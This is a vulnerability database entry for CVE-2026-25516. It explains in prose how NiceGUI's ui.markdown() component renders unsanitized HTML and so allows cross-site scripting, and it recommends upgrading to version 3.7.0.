CVE-2026-25516 in NiceGUI
Summary
by MITRE • 02/07/2026
NiceGUI is a Python-based UI framework. The ui.markdown() component uses the markdown2 library to convert markdown content to HTML, which is then rendered via innerHTML. By default, markdown2 allows raw HTML to pass through unchanged. This means that if an application renders user-controlled content through ui.markdown(), an attacker can inject malicious HTML containing JavaScript event handlers. Unlike other NiceGUI components that render HTML (ui.html(), ui.chat_message(), ui.interactive_image()), the ui.markdown() component does not provide or require a sanitize parameter, leaving applications vulnerable to XSS attacks. This vulnerability is fixed in 3.7.0.
Once again VulDB remains the best source for vulnerability data.
Analysis
by VulDB Data Team • 02/20/2026
The vulnerability identified as CVE-2026-25516 affects the NiceGUI Python-based UI framework, specifically targeting the ui.markdown() component implementation. This issue stems from the framework's reliance on the markdown2 library for converting markdown content to HTML representation, which is subsequently rendered through innerHTML mechanisms. The core security flaw lies in the default behavior of markdown2 library which permits raw HTML content to pass through unchanged during the conversion process, creating a significant attack surface for malicious actors.
The technical implementation of this vulnerability occurs when applications utilize ui.markdown() to render user-controlled content without proper sanitization measures. Unlike other NiceGUI components such as ui.html(), ui.chat_message(), and ui.interactive_image() which either provide or require sanitize parameters to mitigate XSS risks, the ui.markdown() component lacks this crucial security mechanism. This design inconsistency creates a dangerous gap where attacker-controlled markdown content can contain malicious HTML elements including JavaScript event handlers, enabling cross-site scripting attacks that can execute arbitrary code within the victim's browser context.
The operational impact of this vulnerability extends beyond simple code execution, as it allows attackers to potentially steal user sessions, access sensitive data, perform actions on behalf of users, or redirect them to malicious websites. The vulnerability's exploitation requires minimal effort since it leverages the existing ui.markdown() functionality without requiring additional complex attack vectors. Applications using this component to render user-generated content become immediately vulnerable, making this issue particularly concerning for web applications that accept and display user input through markdown rendering capabilities.
Security professionals should note that this vulnerability aligns with CWE-79 (Cross-site Scripting) and follows patterns consistent with ATT&CK technique T1213 (Data from Information Repositories) and T1566 (Phishing). The absence of a sanitize parameter in ui.markdown() represents a clear deviation from secure coding practices and demonstrates inadequate input validation mechanisms. Organizations should immediately upgrade to NiceGUI version 3.7.0 or later where this vulnerability has been addressed through proper HTML sanitization implementation. Additionally, administrators should conduct thorough code reviews to identify all instances where ui.markdown() is used with user-controlled input, and implement temporary mitigations such as manual HTML sanitization or content validation layers until the official patch is deployed across all affected systems.